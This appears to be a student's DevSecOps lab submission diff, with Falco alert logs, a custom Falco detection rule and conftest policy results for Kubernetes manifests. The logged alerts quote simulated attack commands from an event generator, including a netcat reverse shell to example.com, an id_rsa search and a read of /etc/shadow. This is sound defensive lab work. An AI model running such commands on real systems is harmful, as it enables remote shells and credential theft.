+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.973853620+0000: Warning Netcat runs inside container that allows remote code execution | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=nc proc_exepath=/usr/bin/nc parent=event-generator command=nc -e /bin/sh example.com 22 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604780973853620,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"nc -e /bin/sh example.com 22","proc.exepath":"/usr/bin/nc","proc.name":"nc","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Netcat Remote Code Execution in Container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","network","process"],"time":"2026-05-12T16:53:00.973853620Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:01.074549022+0000: Warning Grep private keys or passwords activities found | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp -maxdepth 1 -iname id_rsa terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604781074549022,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname id_rsa","proc.exepath":"/bin/busybox","proc.name":"find","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Search Private Keys or Passwords","source":"syscall","tags":["T1552.001","container","filesystem","host","maturity_stable","mitre_credential_access","process"],"time":"2026-05-12T16:53:01.074549022Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:01.175331075+0000: Warning Symlinks created over sensitive files | target=/etc linkpath=/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2948800653/etc_link evt_type=symlink user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2948800653/etc_link terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.linkpath":"/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2948800653/etc_link","evt.arg.target":"/etc","evt.time.iso8601":1778604781175331075,"evt.type":"symlink","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2948800653/etc_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Symlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-12T16:53:01.175331075Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:01.276350715+0000: Critical Executing binary not part of base image | proc_exe=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-kdMYL1 proc_sname=event-generator gparent=containerd-shim proc_exe_ino_ctime=1778604781275513731 proc_exe_ino_mtime=2961927245519455107 proc_exe_ino_ctime_duration_proc_start=740856 proc_cwd=/ container_start_ts=1778604777834119987 evt_type=execve user=root user_uid=0 user_loginuid=-1 process=falco-event-gen proc_exepath=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-kdMYL1 parent=event-generator command=falco-event-gen terminal=0 exe_flags=EXE_WRITABLE|EXE_UPPER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","container.start_ts":1778604777834119987,"evt.arg.flags":"EXE_WRITABLE|EXE_UPPER_LAYER","evt.time.iso8601":1778604781276350715,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"falco-event-gen","proc.cwd":"/","proc.exe":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-kdMYL1","proc.exe_ino.ctime":1778604781275513731,"proc.exe_ino.ctime_duration_proc_start":740856,"proc.exe_ino.mtime":2961927245519455107,"proc.exepath":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-kdMYL1","proc.name":"falco-event-gen","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Drop and execute new binary in container","source":"syscall","tags":["PCI_DSS_11.5.1","TA0003","container","maturity_stable","mitre_persistence","process"],"time":"2026-05-12T16:53:01.276350715Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:07.387789485+0000: Warning Sensitive file opened for reading by trusted program after startup | file=/etc/shadow pcmdline=event-generator run syscall gparent=containerd-shim ggparent=systemd gggparent=<NA> evt_type=openat user=root user_uid=0 user_loginuid=-1 process=httpd proc_exepath=/bin/event-generator parent=event-generator command=httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604787387789485,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.aname[3]":"systemd","proc.aname[4]":null,"proc.cmdline":"httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s","proc.exepath":"/bin/event-generator","proc.name":"httpd","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file trusted after startup","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-12T16:53:07.387789485Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:07.488990643+0000: Warning Detected ptrace PTRACE_ATTACH attempt | proc_pcmdline=containerd-shim -namespace moby -id 620ecad49db3a3a03d9db9a31c2c70224002d76b79457001b703639877e950f9 -address /run/containerd/containerd.sock evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604787488990643,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"containerd-shim -namespace moby -id 620ecad49db3a3a03d9db9a31c2c70224002d76b79457001b703639877e950f9 -address /run/containerd/containerd.sock","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"PTRACE attached to process","source":"syscall","tags":["T1055.008","container","host","maturity_stable","mitre_privilege_escalation","process"],"time":"2026-05-12T16:53:07.488990643Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T17:01:04.341228872+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/testdir/test.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778605264341228872,"fd.name":"/usr/local/bin/testdir/test.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T17:01:04.341228872Z"}
diff --git a/labs/lab9/falco/rules/custom-rules.yaml b/labs/lab9/falco/rules/custom-rules.yaml
new file mode 100644
index 00000000..03a44460
--- /dev/null
+++ b/labs/lab9/falco/rules/custom-rules.yaml
@@ -0,0 +1,11 @@
+# Detect new writable file under /usr/local/bin inside any container
+- rule: Write Binary Under UsrLocalBin
+  desc: Detects writes under /usr/local/bin inside any container
+  condition: evt.type in (open, openat, openat2, creat) and 
+             evt.is_open_write=true and 
+             fd.name startswith /usr/local/bin/ and 
+             container.id != host
+  output: >
+    Falco Custom: File write in /usr/local/bin (container=%container.name user=%user.name file=%fd.name flags=%evt.arg.flags)
+  priority: WARNING
+  tags: [container, compliance, drift]
\ No newline at end of file
diff --git a/labs/submission9.md b/labs/submission9.md
new file mode 100644
index 00000000..ec668142
--- /dev/null
+++ b/labs/submission9.md
@@ -0,0 +1,69 @@
+# Task 1
+
+## Observations
+
+
+Single understandable output and most interesting one:
+```
+[rightrat | ~/c/DevSecOps-Intro] docker exec --user 0 lab9-helper /bin/sh -lc 'echo custom-test > /usr/local/bin/custom-rule.txt'
+Events detected: 0
+Rule counts by severity:
+Events detected: 0
+Rule counts by severity:
+Triggered rules by rule name:
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:34.229939671+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778604754229939671,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T16:52:34.229939671Z"}
+Triggered rules by rule name:
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:34.229939671+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778604754229939671,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T16:52:34.229939671Z"}
+```
+This triggered both the innate drift rule and my custom rule
+My custom rule triggers on write to /usr/local/bin inside any container. Shouldn't trigger on writes to parental folders and cousin folders
+
+## Test to find out whether the rule would trigger in subdirectories
+```shell
+[rightrat | ~/c/DevSecOps-Intro] docker exec --user 0 lab9-helper /bin/sh -lc 'mkdir /usr/local/bin/testdir'
+[rightrat | ~/c/DevSecOps-Intro] docker exec --user 0 lab9-helper /bin/sh -lc 'echo blah blah > /usr/local/bin/testdir/test.txt'
+{"hostname":"571ea5bf0330","output":"2026-05-12T17:01:04.341228872+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/testdir/test.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778605264341228872,"fd.name":"/usr/local/bin/testdir/test.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T17:01:04.341228872Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T17:01:04.341228872+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/testdir/test.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name=<NA> k8s_ns_name=<NA>","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778605264341228872,"fd.name":"/usr/local/bin/testdir/test.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T17:01:04.341228872Z"}
+```
+
+# Task 2
+
+## Unhardened manifest
+```
+[rightrat | ~/c/DevSecOps-Intro] docker run --rm -v "$(pwd)/labs/lab9":/project \
+                                       openpolicyagent/conftest:latest \
+                                       test /project/manifests/k8s/juice-unhardened.yaml -p /project/policies --all-namespaces | tee labs/lab9/analysis/conftest-unhardened.txt
+WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define livenessProbe
+WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define readinessProbe
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.cpu
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.memory
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.cpu
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.memory
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set allowPrivilegeEscalation: false
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set readOnlyRootFilesystem: true
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set runAsNonRoot: true
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" uses disallowed :latest tag
+
+30 tests, 20 passed, 2 warnings, 8 failures, 0 exceptions
+```
+
+## Hardened manifest
+```
+[rightrat | ~/c/DevSecOps-Intro] docker run --rm -v "$(pwd)/labs/lab9":/project \
+                                       openpolicyagent/conftest:latest \
+                                       test /project/manifests/k8s/juice-hardened.yaml -p /project/policies --all-namespaces | tee labs/lab9/analysis/conftest-hardened.txt
+
+
+30 tests, 30 passed, 0 warnings, 0 failures, 0 exceptions
+```
+
+## Docker Compose manifest
+```
+[rightrat | ~/c/DevSecOps-Intro] docker run --rm -v "$(pwd)/labs/lab9":/project \
+                                       openpolicyagent/conftest:latest \
+                                       test /project/manifests/compose/juice-compose.yml -p /project/policies --all-namespaces | tee labs/lab9/analysis/conftest-compose.txt
+
+15 tests, 15 passed, 0 warnings, 0 failures, 0 exceptions
+```
+
+Doesn't seem to check for everything
\ No newline at end of file